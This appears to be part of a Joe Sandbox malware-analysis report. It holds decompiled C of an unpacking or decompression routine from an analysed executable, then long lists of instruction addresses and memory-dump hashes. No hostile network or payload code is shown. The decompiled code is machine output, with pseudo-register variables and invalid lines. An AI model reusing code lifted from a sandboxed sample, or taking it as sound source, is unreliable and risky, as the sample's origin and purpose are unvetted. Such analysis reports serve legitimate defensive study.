                                                                                                                                                                                                                            											__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            											if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            												L163:
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L77:
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            											__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            											if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            												__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            											__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            											 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            											 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            											__eax = __eax + 1;
                                                                                                                                                                                                                            											__edx = 0;
                                                                                                                                                                                                                            											_t275 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            											__edx = _t275;
                                                                                                                                                                                                                            											__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            											_t284 = __ebp - 0x64;
                                                                                                                                                                                                                            											 *_t284 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            											__eflags =  *_t284;
                                                                                                                                                                                                                            											 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            											L80:
                                                                                                                                                                                                                            											 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            											goto L81;
                                                                                                                                                                                                                            										case 0x1c:
                                                                                                                                                                                                                            											while(1) {
                                                                                                                                                                                                                            												L123:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													break;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												L124:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t414;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            												 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                                                            												if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													L127:
                                                                                                                                                                                                                            													L81:
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            													goto L1;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											L167:
                                                                                                                                                                                                                            											 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                                            											goto L170;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								L171:
                                                                                                                                                                                                                            								_t539 = _t538 | 0xffffffff;
                                                                                                                                                                                                                            								goto L172;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}















                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406ca8
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd2
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d18
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x0040741a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040741c
                                                                                                                                                                                                                            0x00407420
                                                                                                                                                                                                                            0x004075cf
                                                                                                                                                                                                                            0x004075cf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075cf
                                                                                                                                                                                                                            0x00407426
                                                                                                                                                                                                                            0x0040742c
                                                                                                                                                                                                                            0x00407433
                                                                                                                                                                                                                            0x0040743b
                                                                                                                                                                                                                            0x0040743e
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407441
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d5f
                                                                                                                                                                                                                            0x00406d5f
                                                                                                                                                                                                                            0x00406d61
                                                                                                                                                                                                                            0x00406d64
                                                                                                                                                                                                                            0x00406dd5
                                                                                                                                                                                                                            0x00406dd5
                                                                                                                                                                                                                            0x00406dd8
                                                                                                                                                                                                                            0x00406ddb
                                                                                                                                                                                                                            0x00406de2
                                                                                                                                                                                                                            0x00406dec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406dec
                                                                                                                                                                                                                            0x00406d66
                                                                                                                                                                                                                            0x00406d66
                                                                                                                                                                                                                            0x00406d6a
                                                                                                                                                                                                                            0x00406d6d
                                                                                                                                                                                                                            0x00406d6f
                                                                                                                                                                                                                            0x00406d72
                                                                                                                                                                                                                            0x00406d75
                                                                                                                                                                                                                            0x00406d77
                                                                                                                                                                                                                            0x00406d7a
                                                                                                                                                                                                                            0x00406d7c
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406dfc
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e05
                                                                                                                                                                                                                            0x00406e08
                                                                                                                                                                                                                            0x00406e0c
                                                                                                                                                                                                                            0x00406e0f
                                                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e20
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ee1
                                                                                                                                                                                                                            0x00406ee4
                                                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                                                            0x00406eea
                                                                                                                                                                                                                            0x00406eed
                                                                                                                                                                                                                            0x00406ef0
                                                                                                                                                                                                                            0x00406ef3
                                                                                                                                                                                                                            0x00406ef6
                                                                                                                                                                                                                            0x00406ef9
                                                                                                                                                                                                                            0x00406efc
                                                                                                                                                                                                                            0x00406f14
                                                                                                                                                                                                                            0x00406f17
                                                                                                                                                                                                                            0x00406f1a
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f20
                                                                                                                                                                                                                            0x00406f24
                                                                                                                                                                                                                            0x00406f26
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040744d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725b
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x00407490

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                                                                                                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00407395() {
                                                                                                                                                                                                                            				void _t533;
                                                                                                                                                                                                                            				signed int _t534;
                                                                                                                                                                                                                            				signed int _t535;
                                                                                                                                                                                                                            				signed int* _t605;
                                                                                                                                                                                                                            				void* _t612;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					if( *(_t612 - 0x40) != 0) {
                                                                                                                                                                                                                            						 *(_t612 - 0x84) = 0x13;
                                                                                                                                                                                                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                                                                                                                                                                                            						goto L132;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            						__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            						L130:
                                                                                                                                                                                                                            						 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            						 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            						L144:
                                                                                                                                                                                                                            						 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                                            						L145:
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            						 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                                            						L149:
                                                                                                                                                                                                                            						if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            							__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                                            							0 = 1;
                                                                                                                                                                                                                            							__eax = 1 << __cl;
                                                                                                                                                                                                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                                            							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								L140:
                                                                                                                                                                                                                            								 *(_t612 - 0x88) = _t533;
                                                                                                                                                                                                                            								while(1) {
                                                                                                                                                                                                                            									L1:
                                                                                                                                                                                                                            									_t534 =  *(_t612 - 0x88);
                                                                                                                                                                                                                            									if(_t534 > 0x1c) {
                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            										case 0:
                                                                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                                            											_t534 =  *( *(_t612 - 0x70));
                                                                                                                                                                                                                            											if(_t534 > 0xe1) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                                            											_push(0x2d);
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											_pop(_t569);
                                                                                                                                                                                                                            											_push(9);
                                                                                                                                                                                                                            											_pop(_t570);
                                                                                                                                                                                                                            											_t608 = _t538 / _t569;
                                                                                                                                                                                                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                                                                                                                                                                                                            											 *(_t612 - 0x3c) = _t603;
                                                                                                                                                                                                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                                                                                                                                                                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                                                                                                                                                                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                                                                                                                                                                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                                                                                                                                                                                            												L10:
                                                                                                                                                                                                                            												if(_t611 == 0) {
                                                                                                                                                                                                                            													L12:
                                                                                                                                                                                                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                                                                                                                                                                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            													goto L15;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L11;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												do {
                                                                                                                                                                                                                            													L11:
                                                                                                                                                                                                                            													_t611 = _t611 - 1;
                                                                                                                                                                                                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                                                                                                                                                                                            												} while (_t611 != 0);
                                                                                                                                                                                                                            												goto L12;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											if( *(_t612 - 4) != 0) {
                                                                                                                                                                                                                            												GlobalFree( *(_t612 - 4));
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                                            											 *(_t612 - 4) = _t534;
                                                                                                                                                                                                                            											if(_t534 == 0) {
                                                                                                                                                                                                                            												goto L171;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                                                                                                                                                                                            												goto L10;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										case 1:
                                                                                                                                                                                                                            											L13:
                                                                                                                                                                                                                            											__eflags =  *(_t612 - 0x6c);
                                                                                                                                                                                                                            											if( *(_t612 - 0x6c) == 0) {
                                                                                                                                                                                                                            												 *(_t612 - 0x88) = 1;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                                                                                                                                                                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                                                                                                                                                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                                                                                                                                                                                            											_t45 = _t612 - 0x48;
                                                                                                                                                                                                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                                                                                                                                                                                                            											__eflags =  *_t45;
                                                                                                                                                                                                                            											L15:
                                                                                                                                                                                                                            											if( *(_t612 - 0x48) < 4) {
                                                                                                                                                                                                                            												goto L13;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t546 =  *(_t612 - 0x40);
                                                                                                                                                                                                                            											if(_t546 ==  *(_t612 - 0x74)) {
